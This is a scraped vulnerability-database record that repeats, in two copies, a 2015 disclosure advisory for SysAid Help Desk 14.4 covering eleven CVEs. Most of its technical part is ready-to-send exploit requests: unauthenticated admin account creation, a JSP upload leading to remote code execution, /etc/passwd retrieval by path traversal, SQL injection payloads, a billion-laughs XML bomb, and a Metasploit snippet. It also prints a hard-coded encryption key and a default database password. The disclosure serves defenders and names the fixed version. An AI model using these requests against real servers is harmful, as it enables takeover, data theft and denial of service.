HTTP/1.1\nlistName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true\n\nAccepts injection between $$ in ganttSQL parameter.\n\n\n8)\nVulnerability: Denial of service\nCVE-2015-2996 (same CVE as #4)\nConstraints: no authentication or any other information needed \nAffected versions: unknown, at least 14.4\n\nGET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero\n\nThis request will cause the cpu to go to 100% and the memory to balloon for 30+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).\n\n\n9)\nVulnerability: XML Entity Expansion (leading to denial of service)\nCVE-2015-3000\nConstraints: no authentication or any other information needed\nAffected versions: unknown, at least 14.4\n\na)\nPOST /sysaid/agententry?deflate=0\n<?xml version=\"1.0\"?>\n<!DOCTYPE lolz [\n <!ENTITY lol \"lol\">\n <!ELEMENT lolz (#PCDATA)>\n <!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n <!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\n <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n <!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\n <!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\n <!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\n <!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\n <!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\n <!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\n]>\n<lolz>&lol9;</lolz>\n\nb)\nPOST /sysaid/rdsmonitoringresponse\n<lol bomb in POST data>\n\nc)\nPOST /sysaid/androidactions\n<lol bomb in POST data>\n\nThese requests will cause the cpu to go to 100% and the memory to baloon for 10+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).\n\n\n10)\nVulnerability: Uncontrolled file overwrite\nCVE-2015-2993 (same CVE as #1)\nConstraints: no authentication or any other information needed\nAffected versions: unknown, at least 14.4\n\nGET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm\n\nThis will overwrite the file with \"SysAid\". This string is fixed and cannot be controlled by the attacker.\n\n\n11)\nVulnerability: Use of hard-coded password for the SQL Server Express administrator account\nCVE-2015-3001\nConstraints: N/A\nAffected versions: unknown, at least 14.4\n\nWhen installing SysAid on Windows with the built in SQL Server Express, the installer sets the sa user password to \"Password1\".\n\n\n>> Fix: \nUpgrade to version 15.2 or higher.\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "description": "\r\n\r\nHi,\r\n\r\ntl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE.\r\nSysAid have informed me they all have been fixed in 15.2, but no\r\nre-test was performed.\r\n\r\nFull advisory below, and a copy can be obtained at [1].\r\n5 Metasploit modules have been released and currently awaiting merge\r\nin the moderation queue [2].\r\n\r\nRegards,\r\nPedro\r\n\r\n[1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt\r\n[2]:\r\nhttps://github.com/rapid7/metasploit-framework/pull/5470\r\nhttps://github.com/rapid7/metasploit-framework/pull/5471\r\nhttps://github.com/rapid7/metasploit-framework/pull/5472\r\nhttps://github.com/rapid7/metasploit-framework/pull/5473\r\nhttps://github.com/rapid7/metasploit-framework/pull/5474\r\n\r\n>> Multiple vulnerabilities in SysAid Help Desk 14.4\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\nDisclosure: 03/06/2015 / Last updated: 03/06/2015\r\n\r\n>> Background on the affected product:\r\n"SysAid is an ITSM solution that offers all the essentials, with\r\neverything you need for easy and efficient IT support and effective\r\nhelp desk operations. Its rich set of features includes a powerful\r\nservice desk, asset management and discovery, self-service, and\r\neasy-to-use tools for understanding and optimizing IT performance."\r\n\r\nMetasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been\r\nreleased and should be integrated in the Metasploit framework soon.\r\nAll vulnerabilities affect both the Windows and Linux versions unless\r\notherwise noted.\r\n\r\n\r\n>> Technical details:\r\n1)\r\nVulnerability: Administrator account creation\r\nCVE-2015-2993 (same CVE as #10)\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123\r\n\r\nThis creates an account with the following credentials: mr_lit:secret\r\nNote that this vulnerability only seems to be exploitable ONCE!\r\nSubsequent attempts to exploit it will fail even if the tomcat server\r\nis restarted.\r\n\r\n\r\n2)\r\nVulnerability: File upload via directory traversal (authenticated;\r\nleading to remote code execution)\r\nCVE-2015-2994\r\nConstraints: valid administrator account needed (see #1 to create a\r\nvalid admin account)\r\nAffected versions: unknown, at least 14.4\r\n\r\n\r\nPOST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------81351919525780\r\n\r\n-----------------------------81351919525780\r\nContent-Disposition: form-data; name="activation"; filename="whatevs.jsp"\r\nContent-Type: application/octet-stream\r\n\r\n<html><body><%out.println(System.getProperty("os.name"));%></body><html>\r\n-----------------------------81351919525780--\r\n\r\n\r\nThe response returns a page which contains the following:\r\n var imageUrl =\r\n"icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501";\r\n var thumbUrl =\r\n"icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501";\r\n if(imageUrl != null && $.trim(imageUrl).length > 0)\r\n {\r\n document.getElementById("cropbox").src = imageUrl;\r\n document.getElementById("preview").src = thumbUrl;\r\n parent.glSelectedImageUrl =\r\n"icons/user_photo/14222767515000.1049804910604456_temp.jsp";\r\n\r\nGo to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp\r\nto execute the JSP.\r\n\r\n\r\n3)\r\nVulnerability: File upload via directory traversal (unauthenticated;\r\nleading to remote code execution)\r\nCVE-2015-2995\r\nConstraints: no authentication or any other information needed. The\r\nserver has to be running Java 7u25 or lower. This is because Java 7u40\r\n(FINALLY!) rejects NULL bytes in file paths. See\r\nhttp://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more\r\ndetails.\r\nAffected versions: unknown, at least 14.3 and 14.4\r\n\r\nPOST /sysaid/rdslogs?rdsName=../../../../sample.war%00\r\n<... WAR payload here ...>\r\n\r\n\r\n4)\r\nVulnerability: Arbitrary file download\r\nCVE-2015-2996 (same CVE as #8)\r\nConstraints: none; no authentication or any other information needed\r\n(see #5 to obtain the traversal path)\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\r\n\r\n\r\n5)\r\nVulnerability: Path disclosure\r\nCVE-2015-2997\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4; only works on the Linux version\r\n\r\nPOST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>\r\n\r\nMetasploit PoC:\r\n\r\n large_traversal = '../' * rand(15...30)\r\n servlet_path = 'getAgentLogFile'\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'data' =>\r\nZlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) +\r\nrand(300))),\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'accountId' => large_traversal +\r\nRex::Text.rand_text_alphanumeric(8 + rand(10)),\r\n 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))\r\n }\r\n })\r\n\r\nThe response (res.body.to_s) will be similar to:\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\r\n<HTML>\r\n<HEAD><TITLE>Error</TITLE></HEAD>\r\n<BODY>\r\n<H1>Internal Error No#14</H1>\r\n<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip\r\n(Permission denied)</H2>\r\n</BODY></HTML>\r\n\r\nThe tomcat path is revealed between the H2 tags.\r\n\r\n\r\n6)\r\nVulnerability: Use of hard-coded cryptographic key\r\nCVE-2015-2998\r\nConstraints: N/A\r\nAffected versions: unknown, at least 14.4\r\n\r\nSysAid Help Desk uses a hard-coded encryption key and encryption\r\nparameters. If this is combined with an arbitrary file download\r\nvulnerability (such as #4), a malicious user can then decrypt the\r\ndatabase password by downloading the WEB-INF/conf/serverConf.xml file.\r\nAlgorithm: DES password based encryption with MD5 hash\r\nKey: "inigomontoya"\r\nSalt: [-87, -101, -56, 50, 86, 53, -29, 3]\r\nIterations: 19\r\n\r\n\r\n7)\r\nVulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp\r\nCVE-2015-2999\r\nConstraints: valid administrator account needed\r\nAffected versions: unknown, at least 14.4\r\n\r\na)\r\nPOST /sysaid/genericreport HTTP/1.1\r\naction=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin\r\n\r\nParameters:\r\ngroupFilter\r\n\r\naction=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no\r\n\r\nParameters:\r\ncustomSQL\r\n\r\naction=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin\r\n\r\nParameters:\r\ncustomSQL\r\n\r\n(3 different payloads are shown because the reportName parameter seems\r\nto change which parameters have the injection)\r\n\r\n\r\nb)\r\nPOST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE\r\nresizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo=\r\n\r\nParameter:\r\ndir\r\n\r\n\r\nc)\r\nPOST /sysaid/RFCGantt.jsp HTTP/1.1\r\nlistName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true\r\n\r\nAccepts injection between $$ in ganttSQL parameter.\r\n\r\n\r\n8)\r\nVulnerability: Denial of service\r\nCVE-2015-2996 (same CVE as #4)\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero\r\n\r\nThis request will cause the cpu to go to 100% and the memory to\r\nballoon for 30+ seconds. Sending lots of requests causes the server to\r\nslow down to a crawl (although it doesn't seem to crash or hang\r\nforever).\r\n\r\n\r\n9)\r\nVulnerability: XML Entity Expansion (leading to denial of service)\r\nCVE-2015-3000\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\na)\r\nPOST /sysaid/agententry?deflate=0\r\n<?xml version="1.0"?>\r\n<!DOCTYPE lolz [\r\n <!ENTITY lol "lol">\r\n <!ELEMENT lolz (#PCDATA)>\r\n <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\r\n <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\r\n <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">\r\n <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">\r\n <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">\r\n <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">\r\n <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">\r\n <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">\r\n <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">\r\n]>\r\n<lolz>&lol9;</lolz>\r\n\r\nb)\r\nPOST /sysaid/rdsmonitoringresponse\r\n<lol bomb in POST data>\r\n\r\nc)\r\nPOST /sysaid/androidactions\r\n<lol bomb in POST data>\r\n\r\nThese requests will cause the cpu to go to 100% and the memory to\r\nbaloon for 10+ seconds. Sending lots of requests causes the server to\r\nslow down to a crawl (although it doesn't seem to crash or hang\r\nforever).\r\n\r\n\r\n10)\r\nVulnerability: Uncontrolled file overwrite\r\nCVE-2015-2993 (same CVE as #1)\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm\r\n\r\nThis will overwrite the file with "SysAid". This string is fixed and\r\ncannot be controlled by the attacker.\r\n\r\n\r\n11)\r\nVulnerability: Use of hard-coded password for the SQL Server Express\r\nadministrator account\r\nCVE-2015-3001\r\nConstraints: N/A\r\nAffected versions: unknown, at least 14.4\r\n\r\nWhen installing SysAid on Windows with the built in SQL Server\r\nExpress, the installer sets the sa user password to "Password1".\r\n\r\n\r\n>> Fix:\r\nUpgrade to version 15.2 or higher.\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-06-08T00:00:00", "title": "[Multiple CVE's]: various critical vulnerabilities in SysAid Help Desk (RCE, file download, DoS, etc)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2996", "CVE-2015-2994", "CVE-2015-3000", "CVE-2015-3001", "CVE-2015-2999", "CVE-2015-2993", "CVE-2015-2997", "CVE-2015-2995", "CVE-2015-2998"], "modified": "2015-06-08T00:00:00", "id": "SECURITYVULNS:DOC:32179", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32179", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}]}

SysAid &lt; 15.2 Unauthenticated File Upload Vulnerability

Description

Related

SysAid < 15.2 Unauthenticated File Upload Vulnerability